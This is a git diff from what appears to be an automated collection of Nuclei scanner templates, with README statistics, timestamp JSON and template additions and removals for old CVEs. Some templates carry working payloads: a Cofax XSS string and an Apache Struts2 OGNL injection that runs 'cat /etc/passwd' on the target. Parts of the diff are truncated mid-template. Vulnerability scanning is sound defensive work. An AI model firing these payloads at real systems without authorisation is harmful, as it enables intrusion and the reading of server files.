diff --git a/README.md b/README.md index e38ff6b3e8..30e0a984c3 100644 --- a/README.md +++ b/README.md @@ -20,64 +20,143 @@ | CVE-2016 | 249 | | CVE-2017 | 396 | | CVE-2018 | 446 | -| CVE-2019 | 513 | -| CVE-2020 | 591 | -| CVE-2021 | 1733 | +| CVE-2019 | 512 | +| CVE-2020 | 593 | +| CVE-2021 | 1730 | | CVE-2022 | 2467 | -| CVE-2023 | 4754 | -| CVE-2024 | 4843 | -| Other | 23901 | +| CVE-2023 | 4757 | +| CVE-2024 | 4926 | +| Other | 23927 | ## 近几天数量变化情况 -|2024-08-30 | 2024-08-31 | 2024-09-01 | 2024-09-02 | 2024-09-03 | 2024-09-04 | 2024-09-05| +|2024-08-31 | 2024-09-01 | 2024-09-02 | 2024-09-03 | 2024-09-04 | 2024-09-05 | 2024-09-06| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|41558 | 41572 | 41585 | 41584 | 41586 | 41592 | 41615| +|41572 | 41585 | 41584 | 41586 | 41592 | 41615 | 41725| ## 最近新增文件 | templates name | | --- | -| CVE-2024-8318.yaml | -| CVE-2024-8106.yaml | -| CVE-2024-8123.yaml | -| CVE-2024-8325.yaml | -| CVE-2024-8289.yaml | -| CVE-2024-8102.yaml | -| CVE-2024-20419.yaml | -| CVE-2024-8119.yaml | -| CVE-2024-8117.yaml | -| CVE-2024-7950.yaml | -| CVE-2024-7870.yaml | -| CVE-2024-8104.yaml | -| CVE-2024-8121.yaml | -| cve-2021-45096.yaml | -| cve-2021-21402.yaml | -| cve-2019-17382.yaml | -| CVE-2019-9733.yaml | -| CVE-2019-6715.yaml | -| cve-2019-9670.yaml | -| cve-2011-0049.yaml | -| CVE-2018-1000671.yaml | -| ruby-rce.yaml | -| druid-detect.yaml | -| 3733514078.yaml | -| apache-nifi-unauth.yaml | -| ecoa-building-automation-lfd.yaml | -| attributes-for-blocks.yaml | -| 3867691789.yaml | -| 845713912.yaml | -| 3833918288.yaml | -| openx-detect.yaml | -| prometheus-config-endpoint.yaml | -| 2848712183.yaml | -| 823623832.yaml | -| seeddms-detect.yaml | -| 2378487680.yaml | -| wpconfig.yaml | -| error-based-sqli.yaml | -| 834385017.yaml | -| blind-oast-poly.yaml | -| reflection-xss.yaml | -| 2904374066.yaml | -| bookstack-detect.yaml | -| jitsi-meet.yaml | -| 1424627148.yaml | -| CVE-2023-35155.yaml | -| cve-2013-3827.yaml | +| CVE-2024-43999.yaml | +| CVE-2024-43919.yaml | +| CVE-2024-43985.yaml | +| CVE-2024-43952.yaml | +| CVE-2024-43922.yaml | +| CVE-2024-43983.yaml | +| CVE-2024-43956.yaml | +| CVE-2024-43959.yaml | +| CVE-2024-43958.yaml | +| CVE-2024-8363.yaml | +| CVE-2024-43980.yaml | +| CVE-2024-43926.yaml | +| CVE-2024-43972.yaml | +| CVE-2024-43963.yaml | +| CVE-2024-6586.yaml | +| CVE-2024-43950.yaml | +| CVE-2024-43936.yaml | +| CVE-2024-43974.yaml | +| CVE-2024-43941.yaml | +| CVE-2024-29889.yaml | +| CVE-2024-43976.yaml | +| CVE-2024-43981.yaml | +| CVE-2024-43932.yaml | +| CVE-2024-43964.yaml | +| CVE-2024-7380.yaml | +| CVE-2024-43953.yaml | +| CVE-2024-43979.yaml | +| CVE-2024-43934.yaml | +| CVE-2024-20439.yaml | +| CVE-2024-43949.yaml | +| CVE-2024-43944.yaml | +| CVE-2024-43971.yaml | +| CVE-2024-43965.yaml | +| CVE-2024-43921.yaml | +| CVE-2024-43942.yaml | +| CVE-2024-7381.yaml | +| CVE-2024-43984.yaml | +| CVE-2024-43938.yaml | +| CVE-2024-43930.yaml | +| CVE-2024-43955.yaml | +| CVE-2024-43973.yaml | +| CVE-2024-6835.yaml | +| CVE-2024-43970.yaml | +| CVE-2024-43931.yaml | +| CVE-2024-6894.yaml | +| CVE-2024-43962.yaml | +| CVE-2024-6929.yaml | +| CVE-2024-43920.yaml | +| CVE-2024-43924.yaml | +| CVE-2024-43961.yaml | +| CVE-2024-5309.yaml | +| CVE-2024-43940.yaml | +| CVE-2024-43975.yaml | +| CVE-2024-43978.yaml | +| CVE-2024-43982.yaml | +| CVE-2024-43948.yaml | +| CVE-2024-43939.yaml | +| CVE-2024-43954.yaml | +| CVE-2024-43943.yaml | +| CVE-2024-20440.yaml | +| CVE-2024-7627.yaml | +| CVE-2024-41955.yaml | +| CVE-2024-6332.yaml | +| CVE-2024-43935.yaml | +| CVE-2024-43960.yaml | +| CVE-2024-43945.yaml | +| CVE-2024-43977.yaml | +| CVE-2024-43951.yaml | +| CVE-2024-28987.yaml | +| CVE-2024-43927.yaml | +| CVE-2024-43925.yaml | +| CVE-2024-43947.yaml | +| CVE-2024-43923.yaml | +| CVE-2024-7605.yaml | +| CVE-2024-43937.yaml | +| CVE-2024-22120.yaml | +| CVE-2024-43928.yaml | +| CVE-2024-43929.yaml | +| CVE-2024-43957.yaml | +| CVE-2024-43946.yaml | +| CVE-2022-3556.yaml | +| CVE-2022-4529.yaml | +| cve-2016-1000155.yaml | +| azurecurve-toggle-showhide.yaml | +| strapi-admin-installer.yaml | +| dynamic-featured-image.yaml | +| skt-blocks.yaml | +| emlog.yaml | +| strapi.yaml | +| security-antivirus-firewall.yaml | +| maintenance-coming-soon-redirect-animation.yaml | +| wp-armour-extended.yaml | +| classic-addons-wpbakery-page-builder-addons.yaml | +| propovoice-pro.yaml | +| droip.yaml | +| wp-sendgrid-mailer.yaml | +| mobsf.yaml | +| fotawp.yaml | +| sitecore-default-page.yaml | +| daybyday-detect.yaml | +| repetier-unauth.yaml | +| wp-xmlrpc-detect.yaml | +| finereport-sqli-rce.yaml | +| writebook-detect.yaml | +| intothedark.yaml | +| vmware-version-detect.yaml | +| brickscore.yaml | +| wazuh-detect.yaml | +| revivenews.yaml | +| collapsing-archives.yaml | +| edusoho.yaml | +| geoserver-exposed.yaml | +| greenshiftquery.yaml | +| projectsend-auth-bypass.yaml | +| blockbooster.yaml | +| prometheus-flags-endpoint.yaml | +| metabase-detect.yaml | +| esotera.yaml | +| ghactivity.yaml | +| tempera.yaml | +| emlog-installer.yaml | +| yzmcms-detect.yaml | +| greenshiftwoo.yaml | +| CVE-2023-22621.yaml | +| CVE-2023-41621.yaml | +| CVE-2023-6329.yaml | diff --git a/data.json b/data.json index 438f5d7999..5798af62ab 100644 --- a/data.json +++ b/data.json @@ -180,5 +180,6 @@ "2024-09-02": 41584, "2024-09-03": 41586, "2024-09-04": 41592, - "2024-09-05": 41615 + "2024-09-05": 41615, + "2024-09-06": 41725 } \ No newline at end of file diff --git a/data1.json b/data1.json index 1731213565..e64681fd3f 100644 --- a/data1.json +++ b/data1.json @@ -49254,5 +49254,131 @@ "jitsi-meet.yaml": "2024-09-05 02:20:55", "1424627148.yaml": "2024-09-05 02:20:55", "CVE-2023-35155.yaml": "2024-09-05 02:20:55", - "cve-2013-3827.yaml": "2024-09-05 02:20:55" + "cve-2013-3827.yaml": "2024-09-05 02:20:55", + "CVE-2024-43999.yaml": "2024-09-06 02:20:54", + "CVE-2024-43919.yaml": "2024-09-06 02:20:54", + "CVE-2024-43985.yaml": "2024-09-06 02:20:54", + "CVE-2024-43952.yaml": "2024-09-06 02:20:54", + "CVE-2024-43922.yaml": "2024-09-06 02:20:54", + "CVE-2024-43983.yaml": "2024-09-06 02:20:54", + "CVE-2024-43956.yaml": "2024-09-06 02:20:54", + "CVE-2024-43959.yaml": "2024-09-06 02:20:54", + "CVE-2024-43958.yaml": "2024-09-06 02:20:54", + "CVE-2024-8363.yaml": "2024-09-06 02:20:54", + "CVE-2024-43980.yaml": "2024-09-06 02:20:54", + "CVE-2024-43926.yaml": "2024-09-06 02:20:54", + "CVE-2024-43972.yaml": "2024-09-06 02:20:54", + "CVE-2024-43963.yaml": "2024-09-06 02:20:54", + "CVE-2024-6586.yaml": "2024-09-06 02:20:54", + "CVE-2024-43950.yaml": "2024-09-06 02:20:54", + "CVE-2024-43936.yaml": "2024-09-06 02:20:54", + "CVE-2024-43974.yaml": "2024-09-06 02:20:54", + "CVE-2024-43941.yaml": "2024-09-06 02:20:54", + "CVE-2024-29889.yaml": "2024-09-06 02:20:54", + "CVE-2024-43976.yaml": "2024-09-06 02:20:54", + "CVE-2024-43981.yaml": "2024-09-06 02:20:54", + "CVE-2024-43932.yaml": "2024-09-06 02:20:54", + "CVE-2024-43964.yaml": "2024-09-06 02:20:54", + "CVE-2024-7380.yaml": "2024-09-06 02:20:54", + "CVE-2024-43953.yaml": "2024-09-06 02:20:54", + "CVE-2024-43979.yaml": "2024-09-06 02:20:54", + "CVE-2024-43934.yaml": "2024-09-06 02:20:54", + "CVE-2024-20439.yaml": "2024-09-06 02:20:54", + "CVE-2024-43949.yaml": "2024-09-06 02:20:54", + "CVE-2024-43944.yaml": "2024-09-06 02:20:54", + "CVE-2024-43971.yaml": "2024-09-06 02:20:54", + "CVE-2024-43965.yaml": "2024-09-06 02:20:54", + "CVE-2024-43921.yaml": "2024-09-06 02:20:54", + "CVE-2024-43942.yaml": "2024-09-06 02:20:54", + "CVE-2024-7381.yaml": "2024-09-06 02:20:54", + "CVE-2024-43984.yaml": "2024-09-06 02:20:54", + "CVE-2024-43938.yaml": "2024-09-06 02:20:54", + "CVE-2024-43930.yaml": "2024-09-06 02:20:54", + "CVE-2024-43955.yaml": "2024-09-06 02:20:54", + "CVE-2024-43973.yaml": "2024-09-06 02:20:54", + "CVE-2024-6835.yaml": "2024-09-06 02:20:54", + "CVE-2024-43970.yaml": "2024-09-06 02:20:54", + "CVE-2024-43931.yaml": "2024-09-06 02:20:54", + "CVE-2024-6894.yaml": "2024-09-06 02:20:54", + "CVE-2024-43962.yaml": "2024-09-06 02:20:54", + "CVE-2024-6929.yaml": "2024-09-06 02:20:54", + "CVE-2024-43920.yaml": "2024-09-06 02:20:54", + "CVE-2024-43924.yaml": "2024-09-06 02:20:54", + "CVE-2024-43961.yaml": "2024-09-06 02:20:54", + "CVE-2024-5309.yaml": "2024-09-06 02:20:54", + "CVE-2024-43940.yaml": "2024-09-06 02:20:54", + "CVE-2024-43975.yaml": "2024-09-06 02:20:54", + "CVE-2024-43978.yaml": "2024-09-06 02:20:54", + "CVE-2024-43982.yaml": "2024-09-06 02:20:54", + "CVE-2024-43948.yaml": "2024-09-06 02:20:54", + "CVE-2024-43939.yaml": "2024-09-06 02:20:54", + "CVE-2024-43954.yaml": "2024-09-06 02:20:54", + "CVE-2024-43943.yaml": "2024-09-06 02:20:54", + "CVE-2024-20440.yaml": "2024-09-06 02:20:54", + "CVE-2024-7627.yaml": "2024-09-06 02:20:54", + "CVE-2024-41955.yaml": "2024-09-06 02:20:54", + "CVE-2024-6332.yaml": "2024-09-06 02:20:54", + "CVE-2024-43935.yaml": "2024-09-06 02:20:54", + "CVE-2024-43960.yaml": "2024-09-06 02:20:54", + "CVE-2024-43945.yaml": "2024-09-06 02:20:54", + "CVE-2024-43977.yaml": "2024-09-06 02:20:54", + "CVE-2024-43951.yaml": "2024-09-06 02:20:54", + "CVE-2024-28987.yaml": "2024-09-06 02:20:54", + "CVE-2024-43927.yaml": "2024-09-06 02:20:54", + "CVE-2024-43925.yaml": "2024-09-06 02:20:54", + "CVE-2024-43947.yaml": "2024-09-06 02:20:54", + "CVE-2024-43923.yaml": "2024-09-06 02:20:54", + "CVE-2024-7605.yaml": "2024-09-06 02:20:54", + "CVE-2024-43937.yaml": "2024-09-06 02:20:54", + "CVE-2024-22120.yaml": "2024-09-06 02:20:54", + "CVE-2024-43928.yaml": "2024-09-06 02:20:54", + "CVE-2024-43929.yaml": "2024-09-06 02:20:54", + "CVE-2024-43957.yaml": "2024-09-06 02:20:54", + "CVE-2024-43946.yaml": "2024-09-06 02:20:54", + "CVE-2022-3556.yaml": "2024-09-06 02:20:54", + "CVE-2022-4529.yaml": "2024-09-06 02:20:54", + "cve-2016-1000155.yaml": "2024-09-06 02:20:54", + "azurecurve-toggle-showhide.yaml": "2024-09-06 02:20:54", + "strapi-admin-installer.yaml": "2024-09-06 02:20:54", + "dynamic-featured-image.yaml": "2024-09-06 02:20:54", + "skt-blocks.yaml": "2024-09-06 02:20:54", + "emlog.yaml": "2024-09-06 02:20:54", + "strapi.yaml": "2024-09-06 02:20:54", + "security-antivirus-firewall.yaml": "2024-09-06 02:20:54", + "maintenance-coming-soon-redirect-animation.yaml": "2024-09-06 02:20:54", + "wp-armour-extended.yaml": "2024-09-06 02:20:54", + "classic-addons-wpbakery-page-builder-addons.yaml": "2024-09-06 02:20:54", + "propovoice-pro.yaml": "2024-09-06 02:20:54", + "droip.yaml": "2024-09-06 02:20:54", + "wp-sendgrid-mailer.yaml": "2024-09-06 02:20:54", + "mobsf.yaml": "2024-09-06 02:20:54", + "fotawp.yaml": "2024-09-06 02:20:54", + "sitecore-default-page.yaml": "2024-09-06 02:20:54", + "daybyday-detect.yaml": "2024-09-06 02:20:54", + "repetier-unauth.yaml": "2024-09-06 02:20:54", + "wp-xmlrpc-detect.yaml": "2024-09-06 02:20:54", + "finereport-sqli-rce.yaml": "2024-09-06 02:20:54", + "writebook-detect.yaml": "2024-09-06 02:20:54", + "intothedark.yaml": "2024-09-06 02:20:54", + "vmware-version-detect.yaml": "2024-09-06 02:20:54", + "brickscore.yaml": "2024-09-06 02:20:54", + "wazuh-detect.yaml": "2024-09-06 02:20:54", + "revivenews.yaml": "2024-09-06 02:20:54", + "collapsing-archives.yaml": "2024-09-06 02:20:54", + "edusoho.yaml": "2024-09-06 02:20:54", + "geoserver-exposed.yaml": "2024-09-06 02:20:54", + "greenshiftquery.yaml": "2024-09-06 02:20:54", + "projectsend-auth-bypass.yaml": "2024-09-06 02:20:54", + "blockbooster.yaml": "2024-09-06 02:20:54", + "prometheus-flags-endpoint.yaml": "2024-09-06 02:20:54", + "metabase-detect.yaml": "2024-09-06 02:20:54", + "esotera.yaml": "2024-09-06 02:20:54", + "ghactivity.yaml": "2024-09-06 02:20:54", + "tempera.yaml": "2024-09-06 02:20:54", + "emlog-installer.yaml": "2024-09-06 02:20:54", + "yzmcms-detect.yaml": "2024-09-06 02:20:54", + "greenshiftwoo.yaml": "2024-09-06 02:20:54", + "CVE-2023-22621.yaml": "2024-09-06 02:20:54", + "CVE-2023-41621.yaml": "2024-09-06 02:20:54", + "CVE-2023-6329.yaml": "2024-09-06 02:20:54" } \ No newline at end of file diff --git a/links.csv b/links.csv index e9f0e7e1bc..503ea70f8b 100644 --- a/links.csv +++ b/links.csv @@ -456,3 +456,6 @@ https://github.com/Sajibekanti/Nuclei_templates https://github.com/securitytaters/nuclei-templates https://github.com/cyb3r-w0lf/nuclei-template-collection https://github.com/malectricasoftware/SwaggerX +https://github.com/ViktorMares/geoserver-nuclei-template +https://github.com/dat-ayush/nuclei-templates +https://github.com/MuhammadWaseem29/Nuclei-templates-w diff --git a/nuclei-templates/CVE-2004/CVE-2004-0519.yaml b/nuclei-templates/CVE-2004/CVE-2004-0519.yaml index cd4347e716..86da54f93e 100644 --- a/nuclei-templates/CVE-2004/CVE-2004-0519.yaml +++ b/nuclei-templates/CVE-2004/CVE-2004-0519.yaml @@ -4,15 +4,8 @@ info: name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting author: dhiyaneshDk severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. - reference: - - https://www.exploit-db.com/exploits/24068 - - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc - - http://security.gentoo.org/glsa/glsa-200405-16.xml - - http://www.securityfocus.com/archive/1/361857 - remediation: Upgrade to the latest version. - classification: - cve-id: CVE-2004-0519 + description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." + reference: https://www.exploit-db.com/exploits/24068 tags: xss,squirrelmail,cve2004,cve requests: @@ -35,5 +28,3 @@ requests: part: header words: - "text/html" - -# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml new file mode 100644 index 0000000000..c74c52c360 --- /dev/null +++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml @@ -0,0 +1,33 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + author: CasperGN + severity: medium + tags: cve,cve2005,domino + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + reference: + - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf + - https://www.exploit-db.com/exploits/39495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + name: domino-username + regex: + - '(Horde :: User Administration" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/18 diff --git a/nuclei-templates/CVE-2005/CVE-2005-4385.yaml b/nuclei-templates/CVE-2005/CVE-2005-4385.yaml new file mode 100644 index 0000000000..a1b518dfcd --- /dev/null +++ b/nuclei-templates/CVE-2005/CVE-2005-4385.yaml @@ -0,0 +1,30 @@ +id: CVE-2005-4385 + +info: + name: Cofax <= 2.0RC3 XSS + author: geeknik + severity: medium + description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + reference: + - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html + - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 + - http://www.securityfocus.com/bid/15940 + - http://www.osvdb.org/21850 + classification: + cve-id: CVE-2005-4385 + tags: cofax,xss,cve,cve2005 + +requests: + - method: GET + path: + - "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "'>\"" diff --git a/nuclei-templates/CVE-2005/cve-2005-2428.yaml b/nuclei-templates/CVE-2005/cve-2005-2428.yaml deleted file mode 100644 index 061af2a832..0000000000 --- a/nuclei-templates/CVE-2005/cve-2005-2428.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2005-2428 -info: - name: CVE-2005-2428 - author: CasperGN - severity: medium - tags: cve,cve2005 - description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. - reference: - - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - - https://www.exploit-db.com/exploits/39495 - -requests: - - method: GET - path: - - "{{BaseURL}}/names.nsf/People?OpenView" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - name: domino-username - regex: - - '(Horde :: User Administration" + + - type: status + status: + - 200 +# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2005/cve-2005-4385.yaml b/nuclei-templates/CVE-2005/cve-2005-4385.yaml deleted file mode 100644 index bf2da66428..0000000000 --- a/nuclei-templates/CVE-2005/cve-2005-4385.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2005-4385 - -info: - name: Cofax <= 2.0RC3 XSS - description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. - reference: - - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 - author: geeknik - severity: medium - tags: cofax,xss,cve,cve2005 - -requests: - - method: GET - path: - - "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "'>\"" diff --git a/nuclei-templates/CVE-2006/CVE-2006-2842.yaml b/nuclei-templates/CVE-2006/CVE-2006-2842.yaml index 2c5e750191..243a171e68 100644 --- a/nuclei-templates/CVE-2006/CVE-2006-2842.yaml +++ b/nuclei-templates/CVE-2006/CVE-2006-2842.yaml @@ -4,14 +4,8 @@ info: name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion author: dhiyaneshDk severity: high - description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.' - reference: - - https://www.exploit-db.com/exploits/27948 - - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE - - http://www.squirrelmail.org/security/issue/2006-06-01 - - http://secunia.com/advisories/20406 - classification: - cve-id: CVE-2006-2842 + description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable." + reference: https://www.exploit-db.com/exploits/27948 tags: cve2006,lfi,squirrelmail,cve requests: diff --git a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml b/nuclei-templates/CVE-2007/CVE-2007-0885.yaml index 834637471b..b237557509 100644 --- a/nuclei-templates/CVE-2007/CVE-2007-0885.yaml +++ b/nuclei-templates/CVE-2007/CVE-2007-0885.yaml @@ -2,16 +2,10 @@ id: CVE-2007-0885 info: name: Rainbow.Zen Jira XSS + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded author: geeknik severity: medium - description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: - - https://www.securityfocus.com/archive/1/459590/100/0/threaded - - http://www.securityfocus.com/bid/22503 - - http://osvdb.org/33683 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - classification: - cve-id: CVE-2007-0885 tags: cve,cve2007,jira,xss requests: diff --git a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml b/nuclei-templates/CVE-2007/CVE-2007-4556.yaml deleted file mode 100644 index 7bae9bf531..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-4556.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2007-4556 - -info: - name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution - author: pikpikcu - severity: critical - description: | - Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. - reference: - - https://www.guildhab.top/?p=2326 - - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - - https://cwiki.apache.org/confluence/display/WW/S2-001 - - http://forums.opensymphony.com/ann.jspa?annID=54 - classification: - cve-id: CVE-2007-4556 - tags: cve,cve2007,apache,rce,struts - -requests: - - method: POST - path: - - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2007/cve-2007-5728.yaml b/nuclei-templates/CVE-2007/CVE-2007-5728.yaml similarity index 100% rename from nuclei-templates/CVE-2007/cve-2007-5728.yaml rename to nuclei-templates/CVE-2007/CVE-2007-5728.yaml diff --git a/nuclei-templates/CVE-2007/cve-2007-4556.yaml b/nuclei-templates/CVE-2007/cve-2007-4556.yaml new file mode 100644 index 0000000000..1a7b1450ed --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-4556.yaml @@ -0,0 +1,30 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. + reference: https://www.guildhab.top/?p=2326 + tags: cve,cve2007,apache,rce,struts + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml index 367edc8dbf..990afdc4ed 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml @@ -5,13 +5,7 @@ info: author: unstabl3 severity: medium description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. - reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://www.securityfocus.com/bid/29291 - - http://secunia.com/advisories/30333 - - http://securityreason.com/securityalert/3896 - classification: - cve-id: CVE-2008-2398 + reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 tags: cve,cve2008,xss requests: @@ -32,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-2650.yaml b/nuclei-templates/CVE-2008/CVE-2008-2650.yaml deleted file mode 100644 index b640b1fbc1..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-2650.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2008-2650 - -info: - name: CMSimple 3.1 - Local File Inclusion - author: pussycat0x - severity: high - description: | - Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. - reference: - - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 - - http://www.securityfocus.com/bid/29450 - - http://secunia.com/advisories/30463 - - http://osvdb.org/45881 - classification: - cve-id: CVE-2008-2650 - tags: cve,cve2008,lfi - -requests: - - raw: - - | - GET 